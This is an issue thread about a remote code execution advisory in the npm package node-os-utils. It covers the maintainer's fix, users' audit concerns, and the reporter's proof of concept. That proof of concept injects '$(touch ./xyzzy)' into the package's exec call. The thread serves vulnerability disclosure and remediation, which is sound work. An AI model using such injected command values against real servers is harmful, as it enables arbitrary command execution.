package is signed as high severity vulnerability from npm

[gchiocchio]

package is signed as high severity vulnerability from npm

https://nodesecurity.io/advisories/784

[Zorono]

i agree with you...

[SunilWang]

fix done！

https://www.npmjs.com/package/node-os-utils

npm install node-os-utils@1.1.0

[rdimascio]

Seems like this hasn't been fixed yet

https://www.npmjs.com/advisories/784

[SunilWang]

@rdimascio
already modified once, I don't know where there will be risks.
已经修改过一次，我不知道哪里会有风险。

because call system commands?
是因为调用系统命令？

[peterkingsbury]

Could it work to contact the individual who reported the incident? He may have specifics that you can react to. The advisory site https://www.npmjs.com/advisories/784 links his homepage, where there is email for him to be contacted.

Because node-os-utils fails npm audit, and passing npm audit is part of our build pipeline, we can't use it any longer.

[SunilWang]

@peterkingsbury
Email sent, waiting for reply,Thanks for feedback.

[SunilWang]

@peterkingsbury @rdimascio @Zorono @gchiocchio

https://www.npmjs.com/advisories/784

Overview
Versions of node-os-utils prior to 1.1.0 are vulnerable to Remote Code Execution. Due to insufficient input validation an attacker could run arbitrary commands on the server thus rendering the package vulnerable to Remote Code Execution.

Remediation
Upgrade to version 1.1.0 or later

Thank you all，
Latest version 1.2.1

[franktip]

Hello, sorry for the delayed response. The following code snippet demonstrates the vulnerability in the version that I originally examined:

done = function done(){
console.log("Done!");
};

var DUMMY_FILE = './xyzzy';

var command = "$(touch " + DUMMY_FILE + ")";

function dummySource(val){
command += val;
}

dummySource(' ');

var nodeosutils = require('node-os-utils')
var exec = nodeosutils.exec;
exec(command)();

done();

executing this code resulted in the creation of a file "xyzzy" due to the execution of an injected command.

[franktip]

I just tried running this code with the current version of node-os-utils, and the vulnerability appears to have been eliminated.